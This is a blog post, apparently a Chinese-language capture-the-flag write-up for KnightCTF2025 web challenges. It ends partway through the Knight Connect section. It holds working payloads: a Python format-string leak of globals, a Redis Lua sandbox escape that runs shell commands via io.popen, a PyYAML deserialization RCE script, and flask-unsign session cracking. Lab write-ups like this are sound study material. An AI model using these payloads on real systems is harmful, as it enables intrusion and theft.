<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="这次我们SU，AK了所有题目，并列第一嘿嘿，web下午就给打完了  Knight’s Secret Welcome to the Knight’s Secret!The castle’s vault holds a secret key, protected within the CONFIG dictionary.You are a knight tasked with proving the">
<meta property="og:type" content="article">
<meta property="og:title" content="KnightCTF2025(AK)">
<meta property="og:url" content="https://baozongwi.xyz/2025/01/21/KnightCTF2025/index.html">
<meta property="og:site_name" content="baozongwi:H@cking Th3 Fu1ure">
<meta property="og:description" content="这次我们SU，AK了所有题目，并列第一嘿嘿，web下午就给打完了  Knight’s Secret Welcome to the Knight’s Secret!The castle’s vault holds a secret key, protected within the CONFIG dictionary.You are a knight tasked with proving the">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-222256.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-133604.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-133744.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-154340.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-154245.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-210610.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-211321.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-211411.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-212404.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-212428.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-192821.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-215746.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-220623.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-222128.jpg">
<meta property="article:published_time" content="2025-01-21T11:45:29.000Z">
<meta property="article:modified_time" content="2025-01-21T14:27:48.189Z">
<meta property="article:author" content="baozongwi">
<meta property="article:tag" content="php">
<meta property="article:tag" content="yaml">
<meta property="article:tag" content="jail">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://baozongwi.xyz/images/achieve/2025/1/KnightCTF2025/QQ20250121-222256.jpg">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>KnightCTF2025(AK)</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="baozongwi:H@cking Th3 Fu1ure" type="application/atom+xml" />
    
	<!-- mathjax -->
	
	<!-- Waline Comments -->
	
		<link rel="stylesheet" href="https://unpkg.com/@waline/client@v2/dist/waline.css"/>
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">h0me</a></li><!--
     --><!--
       --><li><a href="/about/">Aβout</a></li><!--
     --><!--
       --><li><a href="/tags/">Topi3s</a></li><!--
     --><!--
       --><li><a href="/categories/">Cat4gory</a></li><!--
     --><!--
       --><li><a href="/links/">Li^ks</a></li><!--
     --><!--
       --><li><a href="/search/">Seαrch</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/01/24/ctfshow%E8%A5%BF%E7%93%9C%E6%9D%AF/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/01/20/ctfshow%E5%85%83%E6%97%A6%E6%B0%B4%E5%8F%8B%E8%B5%9B/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://baozongwi.xyz/2025/01/21/KnightCTF2025/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&text=KnightCTF2025(AK)"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&title=KnightCTF2025(AK)"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&is_video=false&description=KnightCTF2025(AK)"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=KnightCTF2025(AK)&body=Check out this article: https://baozongwi.xyz/2025/01/21/KnightCTF2025/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&title=KnightCTF2025(AK)"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&title=KnightCTF2025(AK)"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&title=KnightCTF2025(AK)"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&title=KnightCTF2025(AK)"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&name=KnightCTF2025(AK)&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&t=KnightCTF2025(AK)"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Knight%E2%80%99s-Secret"><span class="toc-number">1.</span> <span class="toc-text">Knight’s Secret</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#KnightCal"><span class="toc-number">2.</span> <span class="toc-text">KnightCal</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Luana"><span class="toc-number">3.</span> <span class="toc-text">Luana</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Baby-Injection"><span class="toc-number">4.</span> <span class="toc-text">Baby Injection</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Admin-Access"><span class="toc-number">5.</span> <span class="toc-text">Admin Access</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Knight-Connect"><span class="toc-number">6.</span> <span class="toc-text">Knight Connect</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exceeding-Knight"><span class="toc-number">7.</span> <span class="toc-text">Exceeding Knight</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        KnightCTF2025(AK)
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">baozongwi</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-01-21T11:45:29.000Z" class="dt-published" itemprop="datePublished">2025-01-21</time>
        
        (Updated: <time datetime="2025-01-21T14:27:48.189Z" class="dt-updated" itemprop="dateModified">2025-01-21</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E8%B5%9B%E9%A2%98/">赛题</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/jail/" rel="tag">jail</a>, <a class="p-category" href="/tags/php/" rel="tag">php</a>, <a class="p-category" href="/tags/yaml/" rel="tag">yaml</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>这次我们SU，AK了所有题目，并列第一嘿嘿，web下午就给打完了</p>
<p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-222256.jpg" alt="1"></p>
<h2 id="Knight’s-Secret"><a href="#Knight’s-Secret" class="headerlink" title="Knight’s Secret"></a>Knight’s Secret</h2><blockquote>
<p>Welcome to the Knight’s Secret!<br>The castle’s vault holds a secret key, protected within the CONFIG dictionary.<br>You are a knight tasked with proving the strength of the vault’s defenses.<br>To succeed, you must craft an input to reveal the hidden key within the system.<br>You will be provided with a user object representing a knight, with attributes ‘name’ and ‘role’.<br>Once you discover the key, input it again to receive the banner of victory.</p>
<p>Example of a safe template: ‘Greetings, {person_obj.name}, the {person_obj.role}.’<br>Type ‘hint’ if you need guidance or ‘exit’ to withdraw from the quest.</p>
</blockquote>
<p>输入<code>hint</code>得到了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hint: The knight object provides insight into the realm, and the vault&#x27;s secrets are hidden in the program&#x27;s structure. Look for ways to explore more than what is visible.</span><br></pre></td></tr></table></figure>

<p>就输入题目里面说的poc，发现用处不大</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Enter your secret: &#123;person_obj.role&#125;</span><br><span class="line">Output: Defender of the Realm</span><br><span class="line"></span><br><span class="line">Enter your secret: &#123;person_obj.name&#125;</span><br><span class="line">Output: Brave Knight</span><br></pre></td></tr></table></figure>

<p>然后问人机又得到了这个</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Enter your secret: Greetings, &#123;person_obj.name&#125;, the &#123;person_obj.role&#125;.</span><br><span class="line">Output: Greetings, Brave Knight, the Defender of the Realm.</span><br><span class="line"></span><br><span class="line">Enter your secret: &#123;person_obj.name&#125; is the &#123;person_obj.role&#125;.</span><br><span class="line">Output: Brave Knight is the Defender of the Realm.</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;person_obj.__class__.__base__&#125;</span><br><span class="line"></span><br><span class="line">&#123;person_obj.__class__.__base__.__subclasses__&#125;</span><br><span class="line"></span><br><span class="line">&#123;person_obj.__class__.__base__.__subclasses__()[132]&#125;</span><br></pre></td></tr></table></figure>

<p>失败了，好像不准使用<code>subclasses</code>，不过想到这里本身就是一个对象了，其实可以直接拿<code>global</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;person_obj.__class__.__init__.__globals__&#125;</span><br></pre></td></tr></table></figure>

<p>拿到KEY之后直接在控制台里面输入就有flag了</p>
<h2 id="KnightCal"><a href="#KnightCal" class="headerlink" title="KnightCal"></a>KnightCal</h2><p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-133604.jpg" alt="1"></p>
<p>看到之后并且RCE发现只能用计算式，那么测试了很久，还是发现没有什么结果，后面队友出了，说的是可以拼接<code>flag.txt</code>，那么直接fuzz出来即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">7195</span><br></pre></td></tr></table></figure>

<p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-133744.jpg" alt="1"></p>
<h2 id="Luana"><a href="#Luana" class="headerlink" title="Luana"></a>Luana</h2><p>开启了6379端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">redis-cli -h 172.105.121.246 -p 6379</span><br></pre></td></tr></table></figure>

<p>直接连接之后，查了一下，可以直接执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br></pre></td><td class="code"><pre><span class="line">172.105.121.246:6379&gt; info</span><br><span class="line"># Server</span><br><span class="line">redis_version:5.0.7</span><br><span class="line">redis_git_sha1:00000000</span><br><span class="line">redis_git_dirty:0</span><br><span class="line">redis_build_id:636cde3b5c7a3923</span><br><span class="line">redis_mode:standalone</span><br><span class="line">os:Linux 6.8.0-51-generic x86_64</span><br><span class="line">arch_bits:64</span><br><span class="line">multiplexing_api:epoll</span><br><span class="line">atomicvar_api:atomic-builtin</span><br><span class="line">gcc_version:9.2.1</span><br><span class="line">process_id:7</span><br><span class="line">run_id:361f148ef3b5211f4c3771965b15102ffeddcaaf</span><br><span class="line">tcp_port:6379</span><br><span class="line">uptime_in_seconds:165</span><br><span class="line">uptime_in_days:0</span><br><span class="line">hz:10</span><br><span class="line">configured_hz:10</span><br><span class="line">lru_clock:9388065</span><br><span class="line">executable:/tmp/redis-server</span><br><span class="line">config_file:/etc/redis/redis.conf</span><br><span class="line"></span><br><span class="line"># Clients</span><br><span class="line">connected_clients:9</span><br><span class="line">client_recent_max_input_buffer:2</span><br><span class="line">client_recent_max_output_buffer:0</span><br><span class="line">blocked_clients:0</span><br><span class="line"></span><br><span class="line"># Memory</span><br><span class="line">used_memory:1027648</span><br><span class="line">used_memory_human:1003.56K</span><br><span class="line">used_memory_rss:7700480</span><br><span class="line">used_memory_rss_human:7.34M</span><br><span class="line">used_memory_peak:5002392</span><br><span class="line">used_memory_peak_human:4.77M</span><br><span class="line">used_memory_peak_perc:20.54%</span><br><span class="line">used_memory_overhead:981862</span><br><span class="line">used_memory_startup:796200</span><br><span class="line">used_memory_dataset:45786</span><br><span class="line">used_memory_dataset_perc:19.78%</span><br><span class="line">allocator_allocated:1732400</span><br><span class="line">allocator_active:2072576</span><br><span class="line">allocator_resident:10539008</span><br><span class="line">total_system_memory:1008324608</span><br><span class="line">total_system_memory_human:961.61M</span><br><span class="line">used_memory_lua:55296</span><br><span class="line">used_memory_lua_human:54.00K</span><br><span class="line">used_memory_scripts:480</span><br><span class="line">used_memory_scripts_human:480B</span><br><span class="line">number_of_cached_scripts:2</span><br><span class="line">maxmemory:0</span><br><span class="line">maxmemory_human:0B</span><br><span class="line">maxmemory_policy:noeviction</span><br><span class="line">allocator_frag_ratio:1.20</span><br><span class="line">allocator_frag_bytes:340176</span><br><span class="line">allocator_rss_ratio:5.08</span><br><span class="line">allocator_rss_bytes:8466432</span><br><span class="line">rss_overhead_ratio:0.73</span><br><span class="line">rss_overhead_bytes:-2838528</span><br><span class="line">mem_fragmentation_ratio:7.81</span><br><span class="line">mem_fragmentation_bytes:6714872</span><br><span class="line">mem_not_counted_for_evict:0</span><br><span class="line">mem_replication_backlog:0</span><br><span class="line">mem_clients_slaves:0</span><br><span class="line">mem_clients_normal:185070</span><br><span class="line">mem_aof_buffer:0</span><br><span class="line">mem_allocator:jemalloc-5.2.1</span><br><span class="line">active_defrag_running:0</span><br><span class="line">lazyfree_pending_objects:0</span><br><span class="line"></span><br><span class="line"># Persistence</span><br><span class="line">loading:0</span><br><span class="line">rdb_changes_since_last_save:3</span><br><span class="line">rdb_bgsave_in_progress:0</span><br><span class="line">rdb_last_save_time:1737441239</span><br><span class="line">rdb_last_bgsave_status:ok</span><br><span class="line">rdb_last_bgsave_time_sec:-1</span><br><span class="line">rdb_current_bgsave_time_sec:-1</span><br><span class="line">rdb_last_cow_size:0</span><br><span class="line">aof_enabled:0</span><br><span class="line">aof_rewrite_in_progress:0</span><br><span class="line">aof_rewrite_scheduled:0</span><br><span class="line">aof_last_rewrite_time_sec:-1</span><br><span class="line">aof_current_rewrite_time_sec:-1</span><br><span class="line">aof_last_bgrewrite_status:ok</span><br><span class="line">aof_last_write_status:ok</span><br><span class="line">aof_last_cow_size:0</span><br><span class="line"></span><br><span class="line"># Stats</span><br><span class="line">total_connections_received:28</span><br><span class="line">total_commands_processed:51</span><br><span class="line">instantaneous_ops_per_sec:0</span><br><span class="line">total_net_input_bytes:5866</span><br><span class="line">total_net_output_bytes:100328</span><br><span class="line">instantaneous_input_kbps:0.00</span><br><span class="line">instantaneous_output_kbps:0.00</span><br><span class="line">rejected_connections:0</span><br><span class="line">sync_full:0</span><br><span class="line">sync_partial_ok:0</span><br><span class="line">sync_partial_err:0</span><br><span class="line">expired_keys:0</span><br><span class="line">expired_stale_perc:0.00</span><br><span class="line">expired_time_cap_reached_count:0</span><br><span class="line">evicted_keys:0</span><br><span class="line">keyspace_hits:0</span><br><span class="line">keyspace_misses:0</span><br><span class="line">pubsub_channels:0</span><br><span class="line">pubsub_patterns:0</span><br><span class="line">latest_fork_usec:0</span><br><span class="line">migrate_cached_sockets:0</span><br><span class="line">slave_expires_tracked_keys:0</span><br><span class="line">active_defrag_hits:0</span><br><span class="line">active_defrag_misses:0</span><br><span class="line">active_defrag_key_hits:0</span><br><span class="line">active_defrag_key_misses:0</span><br><span class="line"></span><br><span class="line"># Replication</span><br><span class="line">role:master</span><br><span class="line">connected_slaves:0</span><br><span class="line">master_replid:bf6987c2c3a4d884fdb8d9fc8fc909bc36f8534d</span><br><span class="line">master_replid2:0000000000000000000000000000000000000000</span><br><span class="line">master_repl_offset:0</span><br><span class="line">second_repl_offset:-1</span><br><span class="line">repl_backlog_active:0</span><br><span class="line">repl_backlog_size:1048576</span><br><span class="line">repl_backlog_first_byte_offset:0</span><br><span class="line">repl_backlog_histlen:0</span><br><span class="line"></span><br><span class="line"># CPU</span><br><span class="line">used_cpu_sys:0.116793</span><br><span class="line">used_cpu_user:0.102646</span><br><span class="line">used_cpu_sys_children:0.002804</span><br><span class="line">used_cpu_user_children:0.000688</span><br><span class="line"></span><br><span class="line"># Cluster</span><br><span class="line">cluster_enabled:0</span><br><span class="line"></span><br><span class="line"># Keyspace</span><br><span class="line">db0:keys=2,expires=0,avg_ttl=0</span><br></pre></td></tr></table></figure>

<p>然后有个版本漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eval &#x27;local io_l = package.loadlib(&quot;/usr/lib/x86_64-linux-gnu/liblua5.1.so.0&quot;, &quot;luaopen_io&quot;); local io = io_l(); local f = io.popen(&quot;cat /f*&quot;, &quot;r&quot;); local res = f:read(&quot;*a&quot;); f:close(); return res&#x27; 0</span><br></pre></td></tr></table></figure>

<h2 id="Baby-Injection"><a href="#Baby-Injection" class="headerlink" title="Baby Injection"></a>Baby Injection</h2><p>查看到有一串base64被打印到了上去，估计是yaml反序列化，后面发现PyYaml &lt;&#x3D; 5.1,那这不是和das的一模一样吗，直接写个比较简单的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">poc = <span class="string">f&quot;yaml: !!python/object/new:subprocess.check_output [&#x27;ls&#x27;]&quot;</span></span><br><span class="line">poc_encoded = base64.b64encode(poc.encode()).decode()</span><br><span class="line"></span><br><span class="line">url = <span class="string">f&quot;http://172.105.121.246:5990/<span class="subst">&#123;poc_encoded&#125;</span>&quot;</span></span><br><span class="line">response = requests.get(url)</span><br><span class="line"><span class="built_in">print</span>(response.text)</span><br><span class="line"><span class="comment"># print(poc_encoded)</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="Admin-Access"><a href="#Admin-Access" class="headerlink" title="Admin Access"></a>Admin Access</h2><p>进去测了很久最后发现在计分板可以得到这个东西</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">.eJyrVopPy0kszkgtVrKKrlZSKAFSSuWJRXmZeelKOkoBOamJxakKOfnpCpl5CiX5ConJyanFxQolGakKKUBtSfmJRSl6SrG1OhToja0FAOhILbY.Z49KFA.Ua3nXdRC0Qb0zeic_9BRbFqENvc</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">flask-unsign --decode --cookie &#x27;.eJyrVopPy0kszkgtVrKKrlZSKAFSSuWJRXmZeelKOkoBOamJxakKOfnpCpl5CiX5ConJyanFxQolGakKKUBtSfmJRSl6SrG1OhToja0FAOhILbY.Z49KFA.Ua3nXdRC0Qb0zeic_9BRbFqENvc&#x27;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">flask-unsign --unsign --cookie &#x27;.eJyrVopPy0kszkgtVrKKrlZSKAFSSuWJRXmZeelKOkoBOamJxakKOfnpCpl5CiX5ConJyanFxQolGakKKUBtSfmJRSl6SrG1OhToja0FAOhILbY.Z49KFA.Ua3nXdRC0Qb0zeic_9BRbFqENvc&#x27;</span><br></pre></td></tr></table></figure>

<p>但是没啥用，在忘记密码的部分发现了这个东西<code>kctf2025@knightctf.com </code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flask-unsign --unsign --cookie &#x27;.eJyrVopPy0kszkgtVrKKrlZSKAFSSuWJRXmZeelKOkoBOamJxakKOfnpCpl5CiX5ConJyanFxQolGakKKUBtSfmJRSl6SrG1OhToja0FAOhILbY.Z49KFA.Ua3nXdRC0Qb0zeic_9BRbFqENvc&#x27; --wordlist C:\Users\baozhongqi\Desktop\output.txt</span><br></pre></td></tr></table></figure>

<p>感觉是session的密码吧结果还是不对，后面直接瞎几把乱测，发现了这个</p>
<p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-154340.jpg" alt="1"></p>
<p>也就是说猜对了账户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kctf2025\kctf2025@knightctf.com </span><br></pre></td></tr></table></figure>

<p>但是密码是不对的，然后去重置密码页面，重置一次之后再慢慢试发现</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kctf2025\kctf2025</span><br></pre></td></tr></table></figure>

<p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-154245.jpg" alt="1"></p>
<h2 id="Knight-Connect"><a href="#Knight-Connect" class="headerlink" title="Knight Connect"></a>Knight Connect</h2><p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-210610.jpg" alt="1"></p>
<p>进去找flag就找到这个东西，然后再看路由，看看啥情况</p>
<p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-211321.jpg" alt="1"></p>
<p>跟进之后拿到了一些邮箱</p>
<p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-211411.jpg" alt="1"></p>
<p>然后接着看路由这个邮箱怎么用</p>
<p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-212404.jpg" alt="1"></p>
<p>跟进这个路由</p>
<p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-212428.jpg" alt="1"></p>
<p> Larave只需要邮箱就可以登录，</p>
